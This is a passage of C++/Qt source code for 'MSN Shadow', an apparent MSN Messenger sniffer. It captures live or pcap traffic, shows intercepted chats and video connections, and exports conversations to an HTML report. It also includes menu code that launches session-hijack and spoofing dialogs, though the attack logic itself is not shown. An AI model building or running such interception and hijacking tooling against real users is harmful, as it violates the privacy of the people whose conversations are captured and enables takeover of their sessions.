	int host = QMessageBox::question(this, "Choose a host to hijack", "What host do you want to hijack the session?", str1, str2, "Cancel", 2, 2);
	if(host == 2)
		return;
	
	if(!host){
	
		if(spooferItem->chat->hijack1 == NULL){
			hijackDlg *hijack = new hijackDlg(this, spooferItem->chat, 0);
			spooferItem->chat->hijack1 = (QDialog*)hijack;
}
		spooferItem->chat->hijack1->show();
		spooferItem->chat->isHijack1 = true;
}
	else {

		if(spooferItem->chat->hijack2 == NULL){
			hijackDlg *hijack = new hijackDlg(this, spooferItem->chat, 1);
			spooferItem->chat->hijack2 = (QDialog*)hijack;
			
}
		spooferItem->chat->hijack2->show();
		spooferItem->chat->isHijack2 = true;
}

}

void msnShadow::spoofer() {

spoofDlg *dlg = new spoofDlg(this, spooferItem->chat, 0);
dlg->show();
}



msnShadowItemVideo* msnShadow::createVideo(QString ip_src, QString ip_dst){

idVideo++;
msnShadowItemVideo *video = new msnShadowItemVideo(videoView, widgetStack2, idVideo, ip_src, ip_dst, appz, ptrWindow);
pontr = video;
video->setText(0,QString("( %1 ) <--> ( %2 )").arg(ip_src).arg(ip_dst));
video->setVisible(false); //to verify if it is a video connection
//widgetStack2->raiseWidget(0); //why?
listVideo.push_back(video);
return video;

}

void msnShadow::createChat(QString ip_src, QString ip_dst, QString packetReceived, int idzao, unsigned short port1, unsigned short port2) {


id++;
QWidget *stackPage = new QWidget(widgetStack1);
QListView *listao = new QListView(stackPage);
listao->addColumn("",410);
listao->header()->hide();
listao->setSorting(-1);
listao->setVScrollBarMode(QScrollView::AlwaysOn);
widgetStack1->addWidget(stackPage, id);

msnShadowItemChat *item = new msnShadowItemChat(userView, id, ip_src, ip_dst, QString::null, QString::null, listao, stackPage, port1, port2 );
connect(listao, SIGNAL(contextMenuRequested(QListViewItem*, const QPoint&,int)), this, SLOT(contextMenuSpoof(QListViewItem*, const QPoint&, int)));

id++;
item->setText(0,(QString("( %1 ) <--> ( %2 )").arg(ip_src).arg(ip_dst)));

int diffWidth = width() - minimumWidth();
int diffHeight = height() - minimumHeight();
item->listView->setGeometry( QRect( 9, 2, 410+diffWidth-250, 360+diffHeight ) );
item->listView->setColumnWidth(0, 410+diffWidth-250);
if(idzao)
item->nick1 = packetReceived;
else {
msnShadowItemMsg *msg = new msnShadowItemMsg(listao, ip_src, ip_dst, QString::null, QString::null, packetReceived, listao->lastItem(), item, QString::null);

}


listChatS.push_back(item);


}


void msnShadow::languageChange()
{
    setCaption( tr( "MSN Shadow" ) );
    userView->header()->setLabel( 0, tr( "Column 1" ) );
    

    msgView->header()->setLabel( 0, tr( "Column 1" ) );
    

    startTextButton->setText( tr( "Start Sniffing" ) );
	startVideoButton->setText("Start Sniffing");
    stopTextButton->setText( tr( "Stop" ) );
    tabWidget2->changeTab( tab, tr( "Text" ) );
    tabWidget2->changeTab( tab_2, tr( "Video" ) );
   
	helpAboutAction->setText( tr( "About" ) );
	optionsAction->setText(tr("Options"));
	reportAction->setText(tr("Save Report HTML"));
	contactAction->setText(tr("Show Contact Lists"));
	pcapFileAction->setText(tr("Open PCAP File"));
    if (MenuBar->findItem(1))
        MenuBar->findItem(1)->setText( tr( "&File" ) );
    if (MenuBar->findItem(3))
        MenuBar->findItem(3)->setText( tr( "&Help" ) );
}







void msnShadow::helpAbout()
{
    aboutdlg *dlg = new aboutdlg(this);
	dlg->show();
}

void msnShadow::optionsW() {
if(!configPtr)
	configPtr = new configDlg(this);
	
	configPtr->show();
	
}

void msnShadow::pcapFileOpen() {

 QString pcapFile = QFileDialog::getOpenFileName(
                    "/",
                    "PCAP files (*.pcap)",
                    this,
                    "open file dialog",
                    "Choose a file to open" );

if(pcapFile.isNull())
	return;

pthread_t tid, tidVideo;
isSniffing = true;
char *dev, errbuf[PCAP_ERRBUF_SIZE], errbufVideo[PCAP_ERRBUF_SIZE];
pcap_t *man, *manVideo;
char bosta[200];
struct bpf_program filter, filterVideo;

QString filter_app = configPtr->textString;
QString filter_appVideo = "";
if(!configPtr->checkAuto->isChecked())
	filter_appVideo = configPtr->videoString;

unsigned char packet[65535];


bpf_u_int32 mask, maskVideo;
bpf_u_int32 net, netVideo;

const char *pcapName = (const char*)pcapFile.latin1();
const char *pcapNameVideo = (const char*)pcapFile.latin1();

man = pcap_open_offline(pcapName, errbuf);
manVideo = pcap_open_offline(pcapName, errbufVideo);

if(man == NULL) {
	QMessageBox::critical(this, "PCAP Error", "PCAP ERROR!");
	return;
}

if(manVideo == NULL) {
	QMessageBox::critical(this, "PCAP Error", "PCAP ERROR!");
	return;
}



if( (pcap_compile(man, &filter, (char*)filter_app.ascii(), 0, net)) == -1){
QMessageBox::critical(this, "PCAP Error", "Filter Error");
	return;
}

if( (pcap_compile(manVideo, &filterVideo, (char*)filter_appVideo.ascii(), 0, netVideo)) == -1){
QMessageBox::critical(this, "PCAP Error", "Filter Error");
	return;
}

if( (pcap_setfilter(man, &filter)) == -1) {
QMessageBox::critical(this, "PCAP Error", "PCAP ERROR!");
	return;
}

if( (pcap_setfilter(manVideo, &filterVideo)) == -1) {
QMessageBox::critical(this, "PCAP Error", "PCAP ERROR!");
	return;
}

pthread_create(&tid, NULL, startTextSniffGlobal, (void*)man);

isSniffingVideoPcap = true;
pthread_create(&tidVideo, NULL, startVideoSniffGlobal, (void*)manVideo);
//startTextButton->setEnabled(false);
//stopTextButton->setEnabled(true);

 

}

void msnShadow::contactOpen() {
	listContacts *newList = new listContacts(this);
	newList->setList(listContact);
	//listContacts newList(this);
	
	newList->show();
	

}

void msnShadow::htmlReport() {
	
	QString reportFile = QFileDialog::getSaveFileName(QDir::home().path(), "HTML(*.html)", this, 0, "Save HTML Report");
	struct tm *ptr;
	time_t lt;
	lt = time(NULL);
	ptr = localtime(&lt);
	QString report;
	report.append("<html><head>\n"
  "<meta content=\"text/html; charset=ISO-8859-1\" http-equiv=\"content-type\">\n"
  "<title>MSN Shadow</title>\n"
"</head>\n"
"<body>\n"
"<div style=\"text-align: center;\"> <img style=\"width: 150px; height: 142px;" "alt=\"\" src=\"shadowbutterfly.jpg\"><big style=\"font-weight:" "bold;\"><big><big><big>MSN "
"Shadow<br></big></big></big></big>\n"
"<br></div>\n");
int index = 0;
	report.append(QString("<big style=\"font-weight:bold;\">Report date: %1 </big><br> \n").arg(asctime(ptr)));
	QListViewItem *item = userView->firstChild();
	
		for(int i = 0; i < userView->childCount();i++){
		if(!item)
			break;
		report.append(QString("<span style=\"font-weight: bold;\">%1</span><br><br>\n").arg(item->text(0).replace(QChar('<'), "&lt;").replace(QChar('>'), "&gt;")));
		msnShadowItemChat *chat = (msnShadowItemChat*)item;
		msnShadowItemMsg *msg = (msnShadowItemMsg*)chat->listView->firstChild();
		
		for(int i = 0; i < chat->listView->childCount();i++) {
		if(!msg)
			break;
		report.append( QString("%1 says to %2:").arg(msg->nick1).arg(msg->nick2));
		report.append( QString("<br>%1<br><br>\n").arg(msg->msg));
		msg = (msnShadowItemMsg*)msg->nextSibling();
}
		
item = item->nextSibling();		


}

report.append("</body></html>\n");
QFile fileReport(reportFile+".html");
fileReport.open(IO_WriteOnly);
fileReport.writeBlock(report.ascii(), report.length());
fileReport.close();
QPixmap pixHtml((const char**)image28_data);
QImage img;
img = pixHtml.convertToImage();
int indexDir = reportFile.findRev("/");
QString diR = reportFile.mid(0, indexDir+1);
img.save(diR+"shadowbutterfly.jpg", "JPEG");


}

void msnShadow::resizeEvent(QResizeEvent *) {
setMinimumSize(600, 571);

int diffWidth = width() - minimumWidth();
int diffHeight = height() - minimumHeight();

userView->setGeometry( QRect( 10, 10, 130+170, 360+diffHeight ) );
videoView->setGeometry( QRect( 10, 10, 130+170, 360+diffHeight ) );

msgView->setGeometry( QRect( 9, 2, 410+diffWidth-300, 360+diffHeight ) );
widgetStack1->setGeometry( QRect( 141+200, 8, 430+diffWidth-250, 380+diffHeight ) );
widgetStack2->setGeometry( QRect( 141+200, 8, 430+diffWidth-250, 380+diffHeight ) );



std::list<msnShadowItemChat*>::iterator it = listChatS.begin();
while( it != listChatS.end()) {
(*it)->listView->setGeometry( QRect( 9, 2, 410+diffWidth-250, 360+diffHeight ) );
(*it)->listView->setColumnWidth(0, 410+diffWidth-250);

it++;
}

int offsetStartUser = 420 - (360+diffHeight-10);

startTextButton->setGeometry(QRect(40, 420+diffHeight, 120, 24));
startVideoButton->setGeometry(QRect(40, 420+diffHeight, 120, 24));
stopTextButton->setGeometry( QRect( 320, 420+diffHeight, 100, 24 ) );
stopVideoButton->setGeometry( QRect( 320, 420+diffHeight, 100, 24 ) );
}

